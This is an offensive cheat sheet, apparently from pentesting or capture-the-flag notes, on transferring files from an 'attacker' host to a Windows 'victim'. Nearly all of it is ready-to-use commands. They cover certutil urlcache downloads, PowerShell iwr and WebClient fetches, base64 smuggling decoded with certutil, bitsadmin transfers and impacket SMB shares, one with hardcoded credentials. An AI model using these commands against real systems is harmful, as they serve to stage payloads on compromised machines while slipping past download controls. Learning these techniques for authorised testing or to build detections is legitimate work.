File Transfer (Windows)

Certutil

Attacker

python -m SimpleHTTPServer 80
python3 -m http.server 80
php -S 0.0.0.0:80

Victim

certutil -f -urlcache -split http://192.168.1.2/file file

PowerShell

Attacker

python -m SimpleHTTPServer 80
python3 -m http.server 80
php -S 0.0.0.0:80

Victim

powershell iwr -uri http://192.168.1.2/file -o file
powershell wget http://192.168.1.2/file -OutFile file
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/file', 'file')

Base64

Attacker

base64 -w0 secret.txt ;echo
RXN0byBlcyBjb24gdW5hIENNRA==

Victim

CMD

echo RXN0byBlcyBjb24gdW5hIENNRA== > out.tmp
certutil -decode out.tmp "C:\users\john\desktop\decode.txt"

PowerShell

[IO.File]::WriteAllBytes("C:\Users\john\desktop\decode.txt", [Convert]::FromBase64String("RXN0byBlcyBjb24gdW5hIENNRA=="))

BITSAdmin

Attacker

python -m SimpleHTTPServer 80
python3 -m http.server 80
php -S 0.0.0.0:80

Victim

bitsadmin.exe /transfer . http://192.168.1.2/file %cd%\file
#or
bitsadmin.exe /transfer . http://192.168.1.2/file C:\Users\user\Desktop\file

SMB

Attacker

impacket-smbserver a . -smb2support

copy \\192.168.1.2\a\file file

SMB (Auth)

ERROR: You can’t access this shared folder because your organization’s security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network

Attacker

impacket-smbserver a . -smb2support -username hacker -password Password1

Victim

C:\victim\> net use x: \\192.168.1.2\a /user:hacker Password1
C:\victim\> dir x:\
C:\victim\> copy x:\file file